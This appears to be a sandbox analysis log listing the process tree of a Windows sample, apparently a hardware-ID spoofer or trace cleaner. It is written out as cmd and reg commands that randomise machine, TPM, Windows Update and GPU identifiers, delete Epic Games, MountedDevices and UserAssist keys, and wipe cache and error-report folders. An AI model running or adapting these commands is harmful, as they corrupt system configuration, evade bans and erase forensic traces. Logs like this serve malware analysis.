    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d %random% /f
    3⤵
    PID:3612
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildLabEx /t REG_SZ /d 20432 /f
      4⤵
      PID:5288
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngine
    3⤵
    PID:5764
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%random%-%random%-%random%-%random%} /f
    3⤵
    PID:5268
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {20432-23569-23617-18248} /f
      4⤵
      Modifies registry key
      PID:5736
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\UnrealEngineLauncher
    3⤵
    PID:5544
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2796
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG delete HKCU\Software\Epic" "Games /f
    3⤵
    PID:6124
  - - C:\Windows\system32\reg.exe
      REG delete HKCU\Software\Epic" "Games /f
      4⤵
      PID:5492
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\AMD
    3⤵
    PID:3952
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %random%-%random%-%random%-%random%%random% /f
    3⤵
    PID:5480
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 20432-23569-23617-1824829733 /f
      4⤵
      PID:3488
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\INTEL
    3⤵
    PID:4100
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
    3⤵
    PID:2628
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Classes\com.epicgames.launcher /f
      4⤵
      PID:4436
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\LocalLow\Microsoft\CryptnetUrlCache
    3⤵
    PID:5624
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1628
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
    3⤵
    PID:5892
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5772
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\EpicGames /f
      4⤵
      PID:5836
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\system_no_output Volume Information\IndexerVolumeGuid
    3⤵
    PID:1528
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
    3⤵
    PID:5992
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\WOW6432Node\Epic" "Games /f
      4⤵
      Modifies registry key
      PID:1980
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v4.0
    3⤵
    PID:5616
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\CLR_v3.0
    3⤵
    PID:5680
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5820
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCR\com.epicgames.launcher /f
    3⤵
    PID:5904
  - - C:\Windows\system32\reg.exe
      reg delete HKCR\com.epicgames.launcher /f
      4⤵
      PID:5512
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C rmdir /s /q "%systemdrive%\Users\%username%\AppData\Local\Microsoft\Internet Explorer\Recovery
    3⤵
    PID:5856
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:292
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:3104
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3552
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      PID:5372
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\%username%\AppData\Local\Microsoft\Feeds
    3⤵
    PID:3208
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:3116
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5720
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      PID:4224
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:2032
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      PID:5804
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Windows\system_no_output32\restore\MachineGuid.txt
    3⤵
    PID:6136
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:840
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      Modifies registry key
      PID:5508
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\ProgramData\Microsoft\Windows\WER
    3⤵
    PID:5068
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:3480
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      PID:3192
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\Users\Public\Libraries
    3⤵
    PID:3016
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
    3⤵
    PID:216
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1704
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\LastEnum /f
      4⤵
      PID:5592
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C @del /s /f /q %systemdrive%\MSOCache
    3⤵
    PID:5528
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5656
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d 20435-1550-87139543 /f
      4⤵
      PID:5840
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2300
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d 20438-12298-26577838 /f
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Modifies registry key
      PID:5756
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5636
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 20438-12298-26577838 /f
      4⤵
      PID:5752
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
    3⤵
    PID:3696
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
      4⤵
      PID:6080
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5904
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d 20438-12298-26577838 /f
      4⤵
      PID:6048
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:5280
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d 20438-12298-26577838 /f
      4⤵
      PID:2764
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:1476
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d 20438-12298-26577838 /f
      4⤵
      PID:4856
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SYSTEM\MountedDevices /f
    3⤵
    PID:5264
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SYSTEM\MountedDevices /f
      4⤵
      PID:3224
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\com.epicgames.launcher /f
    3⤵
    PID:4592
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\com.epicgames.launcher /f
      4⤵
      PID:5544
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
    3⤵
    PID:4320
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
      4⤵
      Modifies registry key
      PID:5508
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
    3⤵
    PID:1208
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
      4⤵
      PID:1976
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
    3⤵
    PID:4324
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
      4⤵
      PID:5580
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
    3⤵
    PID:5940
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
      4⤵
      Modifies registry key
      PID:5960
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
    3⤵
    PID:5836
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:216
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
      4⤵
      Modifies registry key
      PID:5844
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5840
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3168
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Interface /v ClsidStore /t REG_BINARY /d 20442230471167324901279093268026506195085690105712076922836 /f
      4⤵
      Modifies registry class
      PID:1968
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:4080
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5320
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d 20442-23047-1167324901 /f
      4⤵
      PID:1236
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:4852
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5932
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 20442-23047-1167324901 /f
      4⤵
      PID:5680
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:3420
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4872
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d 20442-23047-1167324901 /f
      4⤵
      PID:1160
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
    3⤵
    PID:2788
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Classes\Interface /v ClsidStore /f
      4⤵
      Modifies registry key
      PID:5652
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:3740
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v _DriverProviderInfo /t REG_SZ /d 20442-23047-1167324901 /f
      4⤵
      Modifies registry key
      PID:1920
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d %random%-%random%-%random%%random% /f
    3⤵
    PID:4856
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 /v UserModeDriverGUID /t REG_SZ /d 20442-23047-1167324901 /f
      4⤵
      Modifies registry key
      PID:5548
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
    3⤵
    PID:4692
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3140
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SettingsRequests /f
      4⤵
      Modifies registry key
      PID:4428
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
    3⤵
    PID:5500
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v BackupProductKeyDefault /f
      4⤵
      Modifies registry key
      PID:4424
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
    3⤵
    PID:2032
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v actionlist /f
      4⤵
      Modifies registry key
      PID:4740
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:5476
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3952
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      Modifies registry key
      PID:1976
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
    3⤵
    PID:5536
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:5016
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist /f
      4⤵
      PID:5960
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Hex-Rays\IDA\History /f
    3⤵
    PID:3392
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3208
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History /f
      4⤵
      Modifies registry key
      PID:3948
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
    3⤵
    PID:296
  - - C:\Windows\system32\reg.exe
      reg delete HKCU\Software\Hex-Rays\IDA\History64 /f
      4⤵
      PID:5992
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
    3⤵
    PID:5752
  - - C:\Windows\system32\reg.exe
      reg delete HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\SoftwareProtectionPlatform /v ServiceSessionId /f
      4⤵
      PID:5512
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:628
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4852
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Microsoft\Direct3D /v WHQLClass /t REG_BINARY /d 204481177514633749215770776632731136535945310422047322924 /f
      4⤵
      PID:2872
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:2304
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\Software\Classes\Installer\Dependencies /v MSICache /t REG_BINARY /d 2044811775146337492157707766327311365359453104220473 /f
      4⤵
      Modifies registry class
      Modifies registry key
      PID:5288
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:6108
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SYSTEM\CurrentControlSet\Services\TPM\WMI /v WindowsAIKHash /t REG_BINARY /d 20448117751463374921577077663273113653594531042 /f
      4⤵
      PID:3688
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:4236
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientIdValidation /t REG_BINARY /d 204481177514633749215770776632731136535945310422047322924 /f
      4⤵
      PID:5736
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5788
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4428
  - - C:\Windows\system32\reg.exe
      REG ADD HKCU\SYSTEM\CurrentControlSet\Services\TPM\ODUID /v RandomSeed /t REG_BINARY /d 204481177514633749215770776632731136535945310422047322924 /f
      4⤵
      PID:6124
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:3056
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Internet" "Explorer\Migration /v IE" "Installed" "Date /t REG_BINARY /d 204481177514633749215770776632731136535945 /f
      4⤵
      Modifies Internet Explorer settings
      PID:5392
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5508
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6136
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 20451225243249831555260851169230751072622456 /f
      4⤵
      PID:2716
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:1652
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 20451225243249831555260851169230751072622456 /f
      4⤵
      PID:308
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:4436
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 204512252432498 /f
      4⤵
      PID:2780
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:5792
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 204512252432498 /f
      4⤵
      PID:6024
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:6064
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 204512252432498 /f
      4⤵
      PID:364
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d %random%%random%%random% /f
    3⤵
    PID:3392
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Diagnostics\DiagTrack\SevilleEventlogManager /v LastEventlogWrittenTime /t REG_QWORD /d 204512252432498 /f
      4⤵
      PID:2300
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\System\CurrentControlSet\Control\Notifications /v 418A073AA3BC8075 /t REG_BINARY /d %random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random%%random% /f
    3⤵
    PID:5936
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3860
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\System\CurrentControlSet\Control\Notifications /v 418A073AA3BC8075 /t REG_BINARY /d 20451225243249831555260851169230751072622456248942032522968 /f
      4⤵
      PID:5636
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-EventTracing/Admin /v OwningPublisher /t REG_SZ /d {%random%-%random%-%random%%random%} /f
    3⤵
    PID:5608
  - - C:\Windows\system32\reg.exe
      REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-EventTracing/Admin /v OwningPublisher /t REG_SZ /d {20451-22524-3249831555} /f
      4⤵
      PID:5816
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\IME\Cleaner.exe
    3⤵
    PID:6048
